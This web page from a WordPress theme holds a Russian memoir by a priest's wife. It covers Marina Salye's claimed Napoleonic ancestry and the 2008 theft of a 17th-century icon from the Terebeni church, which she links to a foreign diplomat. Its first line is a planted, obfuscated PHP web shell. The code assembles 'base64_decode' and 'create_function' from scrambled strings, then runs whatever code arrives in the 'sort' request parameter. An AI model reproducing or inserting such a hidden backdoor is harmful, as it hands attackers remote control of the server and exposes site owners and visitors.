nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ДИТЯ политПРИРОДЫ


эпиграф:

Гена  пальцем  не  задавишь !
                                   народная  банальность

   Поскольку  я  себя  в  предыдущей  мемории  представила  адептом  отца  полководца  Кутузова, то, как  говорится, хочется  и  колется  развить  эту  тему  дальше, но  в  совершенно   неожиданном  направлении. За  наше  с  о.Георгием  25-летнее  житьё-бытьё  и  служение здесь, в  Теребенях, среди  громадного  количества перебывавших  здесь  людей  особенно  выделяются   д в о е   –  и  именно  своей  "генетическо-исторической" самопрезентацией. Примечательно, что  их  прославленные предки  –  они  не  только  современники  Кутузова-младшего, но  имеют  к  нему  максимально  прямое  отношение: это  ( вы  не  поверите !)  . . . Наполеон  и  Александр  Первый.

                                                                                                                   – 1
       Обладательницей  генов  Наполеона  была  ни  больше  ни  меньше  как  орлица, методично  клевавшая  печень  нашего  отечественного  Прометея (т.е. Путина, если кто не понял  моего эзопова  языка) – Марина  Евгеньевна  Салье, вселившаяся  в  здешние  благословенные  места  в  2000-м году. То, что  она  таинственный, но  самый  прямой, отпрыск  Наполеона –  она  не  только  не  делала  из  этого  секрета, но, наоборот, обстоятельно  описала  это  в  своих  воспоминаниях, вышедших  уже  после  её  смерти.
  Конечно, живя от нас в пятнадцати километрах,она не могла с первого же обзора окрестностей не посетить нашу старинную церковь. Увидев моего мужа, она  сразу сомлела от его обаяния и после литургии стала с нами приветливо общаться. Но я неосторожно, в контексте вопроса переименования Ленинграда в Санкт-Петербург, простодушно  произнесла слово "Собчак" – и старую женщину просто пулей вынесло из церкви, а  вслед за ней и  её  родственницу, которая успела упрекнуть меня в политической неосторожности. Я была уверена, что больше мы их никогда не увидим. Однако в  один  из  следующих  их  визитов  они после  литургии, прощаясь с нами у ворот, вручили моему мужу машинописную рукопись упомянутых мемуаров (где про  юность  и  без  политики !). Я опять же бесцеремонно всунулась с репликой, что давать их надо не ему, а м н е, поскольку на тот момент у него со зрением было настолько плохо, что мне приходилось читать вслух всё: от книг до церковных записок. Моё вмешательство было величественно проигнорировано. Я же, начав читать мемуары, стала волей-неволей чиркать их карандашом, исправляя опечатки и ошибки, зная, что сёстры мне этого не простят. Действительно, я была подвергнута высочайшему негодованию. Тем не менее (куда  от  меня  деваться)  мы были приглашаемы на их юбилеи, и мой муж каждый раз, кроме прочих свойственных ему подтруниваний и "приколов", искренне  говорил  Марине Евгеньевне, что у неё полководческая осанка . . .
   Хочется  рассказать  один, условно  говоря, з а б а в н ы й  эпизод. Может быть, это  был  последний  приезд  в  нашу  церковь  Марины  Евгеньевны. Она  всё  ещё  кипела  антагонистическими  чувствами. После  службы  она  решительно  призвала  к  себе о.Георгия  и  так  же  решительно  изложила  ему  свой  план  письменного  возмездия  на  основе  десяти  заповедей. Она  разделит  лист  бумаги  пополам: с одной  стороны  каждая  заповедь, а  против  неё, в  другой  колонке, её  нарушение   идейными  врагами  –  не правда  ли, оно  будет  сильно  и  выразительно ?
   Я  очень  любила  в  своём  муже  способность  нежно  и  ласково  язвить  и  просто "глаголом  жечь".  Муж  не  моргнув  глазом  елейным  голосом  пояснил:
  — Голубушка ! Да  какие  там   десять   нарушаемых   п о л и т и к а м и   заповедей ? Ведь  почти  половина  из  десяти Заповедей   не  относится  к  земной  –  человеческой  обывательской  –  жизни, а  регулирует  взаимоотнеошение  индивидума  и  Бога ! Это  "да  не  будет  у  тебя  других  богов"; это  "не  сотвори  себе  кумира"; это  "помни  день  субботний"; это "не  поминай  имени  Господа  всуе".
    Марина  Евгеньевна  на  миг  глубоко  задумалась, сделала  отсекающий  жест  рукой, резюмирующе  произнеся:
 — Да, действительно, лишние  они: не  нужны  эти  четыре  нам !

     Чтобы  добраться  по  дороге, ведущей  к  деревне  Марины  Евгеньевны  от  большака (и  обратно  после  радушного  гостевания) надо  было   испытать  что-то  вроде  космонавтского тренинга. Именно  заваливаясь  в  салоне  внедорожника  в  разные  стороны  от  немыслимых  колдобин  просёлочной  траншеи, мы  услышали  про  новогоднюю телеграмму  Президента, от  которой  Марину  Евгеньевну  как  ветром  сдуло  из  Петербурга  в  наследственную (от  тётушки) вотчину недалеко  от  нас. Удивительно, что  в  Интернете  сами  же  родственники, от  которых  мы, повторяю, услышали  про  телеграмму, и  отрекаются  от  неё, уверяя, что  это  всё  пиар-придумка. Тогда  же, в  шарахающейся  машине, нам  было  рассказано, что  Марине  Евгеньевне и  новоржевское  начальство, и  добрые  люди  предлагали  выправить  дорогу,  сделать  её  цивилизованной. Старушка  же  категорически  возражала, наивно  думая, что  непроезжая  дорога  –  гарантия  её  безопасности. В  очередной  раз  я  выскажу  чисто   с в о ю   мысль, но  абсолютно  логичную. Когда  Марину  Евгеньевну  на  её  "наполеоновском  острове  святой  Елены"  так  прихватило  с  сердцем, что  надо  было  её  срочно  вывозить  в  больницу, несомненно, ужасная  дорога  могла  быть  решающим  фактором  в  смертельном  исходе  поездки . . .

      Но, вернусь  к  заглавной  теме  своей  мемории  –  о  генетическом  даровании  мох  героев. Тому, что  Марина  Евгеньевна  Салье – прямой  отпрыск  Н а п о л е о н а, она  в  своей  книге  "Ностальгия"  посвятила  пять  страниц  убористого  текста. Я  же  уложу  её  повествование  в  краткую  схему.
      Как  известно, Наполеон  переметнулся  к  Жозефине  в  Париже, оставив  свою  официальную  невесту  Дезире  Клари  в  Марселе. Знал  ли  он  или  не  знал, что  оставил  невесту  беременной  –  совсем  другой  вопрос. Родилась  девочка (пра-пра Марины  Евгеньевны), которую  отдали  в  приют, но  с  очень  богатым  наследством, благодаря  которому  её  смогли  выдать  замуж  за  легкомысленного  маркиза  Жана  Салье, сына  гильотинированного  Салье  де Кремерье. От  этого  брака  родились  девочка  и  двое  мальчиков, один  из  которых, Поль  Салье  – прадед  Марины  Евгеньевны, который  после  разорения  и  смерти  отца  рванул  в  Россию, где  вполне  прижился, став  Павлом  Ивановичем  Салье.
   Пожалуй, надо  напомнить, что  бывшая  невеста  Наполеона  Дезире  Клари  (повторяю, пра-пра-пра  Марины  Евгеньевны) вышла  замуж  за  приятеля  и  соратника  Наполеона  –  Бернадота. И  через  тернии  к  звёздам  эта  чета, волею  судеб  и  Наполеона, через  недолгое  время  вступила  на  Шведский  престол, основав  любимую  в  Швеции  и  доныне  династию  Бернадотов, что  также  добавляло  Марине  Евгеньевне  обоснованного  величия. И  ещё  только  добавлю  к  генетической  помпезности  Марины  Евгеньевны, что  по  линии  матери  она  была  Буре  –  да, да:  она  потомок  известнейшего  часовщика (а  про  родственников-хоккеистов  она  не  любила  вспоминать, только  единожды  о  них  упомянув  в  разговоре, что, мол, она  как   Б у р е   больше, чем  они  все  вместе  взятые).
    Вот  и  делайте  глубокомысленные  выводы  типа  вышенаписанного  эпиграфа, а  также  ещё  одного  любимого  народом  выражения:  от  яблони  яблоко, от  ёлки  шишка . . .

                                                                                                           – 2  –
эпиграф:

      Бог  шельму  метит.
                         народная  примета

       Существует  два  равноправных  и, вероятно, переводных  афоризма: "Бог – в деталях"  и "дьявол – в  мелочах". Следующая  моя теребенская  интрига  с  героем  уникальных  генов  достойна  большей  скрупулёзности  в  повествовании, чем  буде  здесь  представлена. Но  я  себе  поставила  задачу  не  размусоливать  и  писать  как  можно  короче, тезисно.

    Итак. Промыслительность  начавшейся  цепи  событий  почувствовалась  с  самого  начала.

    1996 год. Не постная  пятница –  на "сплошной" (т.е. не постной) неделе, сразу  после  Троицы. На  этот  день  к  нам  в  Теребени  напросились  в  гости  дамы  из  Опочки, и  я  размахнулась  встретить  их  сытным  обедом, вплоть  до  мороженого  на  деревенских  сливках. И  когда  обед  был  готов,  поступил  от  этих  мадам  звонок  с  отменой  визита. Я  не  успела  отчаяться, как  в  нашу кухню-гостиную  ввалилась  компания  очень  непростых  и  голодных  мужиков, туристически  обозревавших  окрестности. Среди  них  был  особо  выделявшийся  элегантностью  и  обходительностью  человек, и   когда  мой  муж   его  спросил,  кто  он  по  имени  и  по  профессии, тот  сказал  с  еле  уловимым  акцентом:" Я  пол'итик." Муж  спросил, к  какой  же  он  религиозной  конфессии  принадлежит –  он  сказал, что  крестился  в  православие  в  Печорском  монастыре. В  процессе  обеда  и  после  него  я  общалась  исключительно  с  этим  гостем, а  муж  –  с  остальными, с  которыми  и  вышел  прогуляться. Мы  остались  одни, и  я  решила  "обкатать" на  иностранном  "пол'итике" свою  оригинальную  идею  по  поводу  того, что  "шведская  модель"  вовсе  не  шведская, а … русская, и  это  связано  именно  с  М.И.Кутузовым, отец  которого  у  нас  захоронен  под  церковью.
   Сначала  гость  от  неожиданности, конечно, фыркнул (мол, ну, конечно  же: Россия  –  родина  слонов !), но  вдруг  сосредоточился (ой, к а к   это  было  красиво !) и  быстро  в  мою  мысль  врубился, одной  репликой  даже дополнив  её, отчего  я  "сомлела". Боже, да  "какие  люди  в  нашем  Голливуде" ! Я  после  их  отъезда   долго  не  могла  придти  в  себя  от  восторга. Но  мой  потенциально  ревнивый  муж  стал   меня  постоянно  дразнить:
  —  Да  твой S. –  шпион, маcон , (. . .) !
  — Ой, –  вскрикивала  я, – только  не  (. . .) !

     Прошло  месяца  три. Муж  лежал  на  диване  и  смотрел  телевизор, я  ковырялась  в  кухне. Вдруг  он  закричал:" Эй, Валька, беги  сюда  скорее  –  твоего S. показывают !"  Я  бросилась  к  телевизору,  а   та-а-м . . . "мой S"  стоит  между  нашим  Ельциным  и  главой  того  государства, чьи  дипломатические  функции  "мой S"  выполнял,  и  стоит S. третьим  "не  лишним"  – между  главами  государств, что-то  помечая  в  своей  записной  книжечке ! Ну, я  совсем  после  этого  перед  всеми  расхвасталась  и  зазналась . . .

    Прошло  полгода. 1997 год.
    О.Георгий  в  школьные  весенние  каникулы  поехал  в  Петербург.
    Апрель, четвёртое  число. Муж  звонит  мне  и  гарантирует, что  сейчас  я  упаду  от  сенсации: по  дороге  к  нашим  друзьям, которые  живут  на  ул.Некрасова, он  зашёл  в  комиссионный  магазин (куда  всегда  заходил  посмотреть  на  фотоаппараты), но  проходя  через  антикварный  отдел, столкнулся  со  знакомой  из  Эрмитажа ( не  той, которая  моя  подружка, с  другой), а  при  ней  оказался … "мой S", который  изо  всех  сил  пытался  затесаться  промеж  людей  у  прилавка, чтоб  муж  его  не  заметил. Тем  не  менее  муж  "выковырял"  из  толпы  этого  иностранца, который упорно  отнекивался  и  отбрыкивался. Но  надо  знать  моего  мужа . . . Эрмитажная  знакомая  была  тоже  немало  удивлена  этой  встрече  и  знакомству  двух  совершенно  разноплановых  мужчин. Сдавшись  наконец  и  "вдруг"  "вспомнив",  к т о   перед  ним, "мой S"  сказал, что  только  несколько  часов  он  проездом  через  город  на  Неве  – и  вот  тебе  такая  неожиданная  встреча !
     О.Георгий  часто  любил  вспоминать  мимикрию S.: если  в  Теребенях  он  был  в  дорогом  костюме  с  небрежно  накинутым  длинным  белым  шарфом, изысканно  причёсанный, то  в  магазине  выглядел  простым  прохожим, как  муж  выражался "в  чуть  ли  не  газовщической  куртке", с дешёвым  шарфом  вокруг  шеи  до  подбородка, а  изысканный  перманент  был  прикрыт  какой-то  ерундой. При  этом  мой  муж  с  ухмылкой  добавлял:
  — А  вот  дорогущие   о ч к и    он  не  смог  заменить  на  пластмассовые  для  полного  комплекта  убогости !

Именно  по  "эксклюзивным"  очкам  муж  и  приметил  в  толпе S., которому  ничего  больше  не  оставалось, как  рассыпаться  в  комплиментах  и  благодарных  воспоминаниях  о "сказочном  пире" в  Теребенях. Муж  потребовал, чтобы S. запечатлел  для  меня  все  эти  комплименты  в  записке, а  то, мол  " Валентина  не  поверит  и  скажет,  что  я  всё  выдумал ".
     Получив  эту  записку (в  которой S. педантично  и  поставил  дату  04.04.97) ясное  дело, я  была  от  счастья  на  седьмом  небе !  . . . " Какие  люди…! " . . .

    Прошло  пять  лет. 2000 год.
    Неожиданно  мы  получаем  от S. письмо  на  нескольких  открытках  с  видами  столицы  государства, куда  он  получил  дипломатическое  направление, и  с  извинениями  за  долгое  молчание (мы  раньше  поздравляли  друг  друга  с  праздниками). Конечно, я  приняла  предложение S. интенсивнее  переписываться, заставляя  прежде  всего  мужа, о.Георгия,  по-священнически  лидировать  в  этом  эпистолярном  процессе, назидая  пол'итика  в  духовном  ключе.

    Прошло  ещё  два  года. 8  сентября 2002 года. Воскресенье. После  литургии.
    Вдруг – то  есть  совершенно  неожиданно (ибо  муж  не  расслышал  накануне  по  телефону, что  именно   о н и  собираются  к  нам  в  Теребени  в  гости) в  кухню  входят S.  с  женой-графиней  и  дочкой  в  сопровождении  друзей, которые  их  подвезли ( и  которые,  в  свою  очередь,  невнятно  накануне  сообщили  о  визите). От  неожиданности  у  меня  был  такой  стресс, что  несколько  дней  я  не  могла  придти  в  себя. . .  скажу  только, что  через  пару  дней  я  попросту  взяла  лист  А-4  и  написала  около  сорока (!) пунктов,  ч т о   именно  в  этом  визите  мне  было  непонятно, неприятно  и  даже  абсурдно . . . Но  переписка  наша  с S. после  этого  стала  интенсивнее  и  даже  теплее. Потом  она  снова  сошла  на  нет. Однако  в  процессе   переписки  у  меня  возникло  какое-то  тревожное  чувство: уж  больно  трепетно S. пару  раз  отозвался  о  нашем  "Благоразумном  разбойнике", иконе 17-го  века, размером  2 метра  на  70 см; он  просто  влюбился  в  неё …  или  в  него . . .   Я  даже  пошла  в  наш  храм  и  обмазала  все  иконы ( особенно  "Разбойника") только  что  полученной  нами  от  милиционеров  их  специфической  " х и м л о в у ш к о й " (солидол  с  родомином).

     Ах, да, чуть  не  забыла  о  главном-то  сказать, что  и  является  темой  моей  мемории:  г е н е т и ч е с к а я    особенность  происхождения  героев  моей  мемории. Именно  в  том  визите S.  и  поведал  о.Георгию, что  он  произошёл  от  нашего  Александра  Первого, поскольку  на  Венском  конгрессе  в  своё  время  русский  царь  имел  соитие  с  австрийской  пра-пра-, от  которой  цепочка  поколений  дошла  до S.  Это  же  он  рассказал  и  привезшим  его  друзьям – то  есть  "по  секрету  всему  свету" !

     Прошло  ещё  шесть  лет.
     В  ночь  с  6  на  7  июля 2008 года  (то  есть  "в  ночь  на  Ивана  Купалу") было  совершено  злодейское  проникновение  в  нашу  церковь  с  изъятием  иконы "Разбойника" (повторяю, два  метра  на  семьдесят  см) и  рядом  висевшей иконы "Воскрешение  Лазаря", тоже  семнадцатого  века. Хотя  других  икон  не  взяли.
   У  нас  были  соседи-дачники  с  компьютером, и  я  в  отчаянии  попросила  их  выудить  информацию  из  Интернета  про S.
   Боже ! В  своих  интервью  он  говорит, намекая  на  своё  происхождение, что "конечно  же !", он  с  детства  крещён  –  а  как  же  иначе: ведь  его  бабки-тётки   имели   р у с с к у ю   кровь !  А  на  вопрос  журналистки, почему  в  его  рабочем  кабинете  висит  "странная  картина  –  павший  Икар", S. отвечает, что, во-первых, картина  из  его  личной   к о л л е к ц и и,  а  во-вторых, концептуально  она  ему  помогает  в  его  нелёгком  дипломатическом  труде.
    В качестве  примечаний  к  кратко  сказанному  всё  же  добавлю, что  милицейская "химловушка" "сыграла  свою  роль: идиот-исполнитель, "работавший" без  перчаток, соскользнул  по   коварному зелью  пальцем  и  оставил  на  стенке  около  снимаемой  иконы    о т п е ч а т о к   пальца, впечатливший  экспертов,  и   вдобавок  унёс  на  себе  вместе  с  иконой  ватки  с  химловушкой, которые  я, чтоб  их  не  выбрасывать, позасовывала  за  иконы ! Несколько  лет  этот  отпечаток, обведенный  мною  в  рамку, красовался  на  стене, пока  непроинформированная  старушка  не  стёрла  его  в  предпасхальной  уборке. А  наша  европейская  приятельница  умудрилась  на основании  того, что  "она  член  теребенской  общины", официально  запечатлеть  нас  в  . . . Европейском  же  Интерполе  –  мне  пришлось  со  скандалами  заставить  моего  инертного  мужа   оформиться  в  российских  отделениях  Интерпола !  Ну  и  толку  от  всего ?? )
     Но . . ."не   надейтеся  на  князи, на  сыны  человеческия  –  в  нихже  несть  спасения: изыдет  дух   его  и   возвратится  в  землю  свою  –  в  той  день  погибнут  вся  помышления  его"  – поём  мы, православные,  почти  на   к а ж д о й  литургии !

    Все  наши  прихожане-приезжане, конечно,  охали  да  ахали  по  поводу  случившегося. А  одна  москвичка  настолько  близко  к  сердцу  приняла  эту  кражу,  что  пообещала  пойти  в  Москве  к  святой  Матроне  с  той  только  просьбой, чтобы  она  помогла  найти  иконы. Вот  тут-то  и  случилось  очередное  чудо.
    Хорошо, что  от  неё  телефонный  звонок  мой  муж  принял  сам, настолько  сказанное  было  фантастично.
    Москвичка  сказала, что  была  в  знаменитом  городе  Клин  (там  усадьба Чайковского)  на  литургии  в  Святотихоновской  церкви, где  вёл  службу  настоятель о.Анатолий  Фролов. После  службы  она  эмоционально  рассказывала  окружающим  про  нашу  кражу. Тютелька  в  тютельку  на  том  месте  рассказа, где  она  произнесла  название  иконы "Благоразумный  разбойник", проходивший  мимо  о.Анатолий  резко  повернул  к  группе  прихожанок  и  обалдело  переспросил:
  — Что? Какой-такой "Благоразумный  разбойник"  украден? Я, кстати, знаю  одного  (он  сказал  слово, что-то  типа  "помешанного") человека, который  сам  не  свой  от  Разбойника …(но  слушайте  дальше!) – он  иностранный   д и п л о м а т (!!!) …
     И  тут  о.Анатолий   н а з в а л   имя  и  фамилию S., что  москвичке было  не  под  силу  ни запомнить, ни  тем  более  воспроизвести ! Но  мало  того, он  продолжил  с  ещё  более  потрясающим  дополнением:
    –Я  его   с а м    к р е с т и л . . .
      Но  и  этого  мало ! О.Анатолий  продолжал:
   — Он  нас  всех  в  церкви  удивил, просто  ошарашил. Он  предъявил  нам  старинную  икону, века  едва  ли  не  13-го, Божией  Матери. Но  вот  ч т о   при  этом  он  сказал ! Мол, сотрите  это  изображение  и  нарисуйте  мне . . .  Разбойника ! Мы  так  все  и  остолбенели, потом  стали  его  уговаривать, что  качественно, классно, канонично  напишем  новую  икону, не  надо  трогать  Божию  Матерь. А  он  упёрся  на  своём !
   Я  тут  же  побежала  к  соседям-дачникам, и  они  нашли  в  Интернете  телефон  Святотихоновской  церкви  в  Клину. Мы  собрались  вокруг  мужа, а  он  набрал  этот  номер, и  случилась  очередная  Божия  милость. Тот, кто  взял  трубку  на  том  конце, был  стар  и  глух, ничего  не  понимал. Но  мимо  непонятливого  проходил  кто-то  толковый, он  подхватил  трубку  и  тут  же продиктовал  мобильный  телефон  о.Анатолия. Муж  тут  же  набрал  полученный  номер, включил  громкую  связь, и  мы  все  услышали  диалог  двух  священников. Отец Анатолий  выразил  своё  неимоверное  удивление  ситуации: ведь  он  мог  пройти  мимо  "базарящих" прихожанок  минутой  раньше  или  минутой  позже!  Да, всё  было  так, как  передала  о.Георгию  москвичка.
    Мой  муж  задал  о.Анатолию  только  один  и  очень  правильный  вопрос:
  — Скажите, пожалуйста,  а   к о г д а   именно  вы  крестили  этого  дипломата: до  или  после 1996 года, когда  он  впервые  посетил  Теребени  и  увидел  "Благоразумного  разбойника"? Интересно,Теребенский  Разбойник  только  усугубил  его  страсть к  этому  образу? Или  же  именно Теребенский  Разбойник   з а р о д и л  в  нём  эту  страсть?
   Отец  Анатолий  дал  неожиданный  ответ:
  —  А  это  мне  легко  вспомнить, только  надо  поднять  документы  того  времени: я  тогда  занимался  одним  делом  и  по  датам  я  точно  скажу,  когда  был  крещён S.

  Вот  так. Нам S. сказал, что  крестился  в  Печорском  монастыре, в  интервью  –  что  крещён  с  детства, а  отец  Анатолий  Фролов  сказал, что  крестился S.  у  него, лично, в  Клину!
     Пол'итик, блин !
Святая  мати  Матрона, моли  Бога  о  нас, грешных ! ! !
                                               
                                                            (Тем  более, что  св.Матрона  и  я НИКОНОВЫ !)

=========================================================================================================================================


украденные в  2008  "Благоразумный разбойник"  и  (справа ) "Воскрешение  Лазаря".
(а  сверху  "царя Давида"  17-го  века  почему-то  не  взяли )

две  иконы  "Благоразумного  разбойника" (масло,дерево  и  темпера,холст) о.Георгию  в  утешение  написали  в  реставрационном  отделе Государственного  Русского  музея (спонсор – Измаков  Сергей  Геннадьевич)
телепередача  Алексея  Олиферука, канал "Россия", "Вести"  от  1 октября  2009 года.

============================================================
=============================================================
P/S
". . .А  знаете  ли, что  у  алжирского дея (вариант: бея)  под  самым  носом . . .!  "
                                               
          = А  знаете  ли, что  у   знаменитого  голливудского  актёра Питера  Фалька, который  игал  лейтенанта Коломбо в  одноимённом  сериале, с  детства  (с трёхлетнего  возраста)  после  операции  (ретинобластома) был  . . . искусственный, с т е к л я н н ы й !   г л а з (правый)   и    р у с с к и е    корни ?? !


Добавить комментарий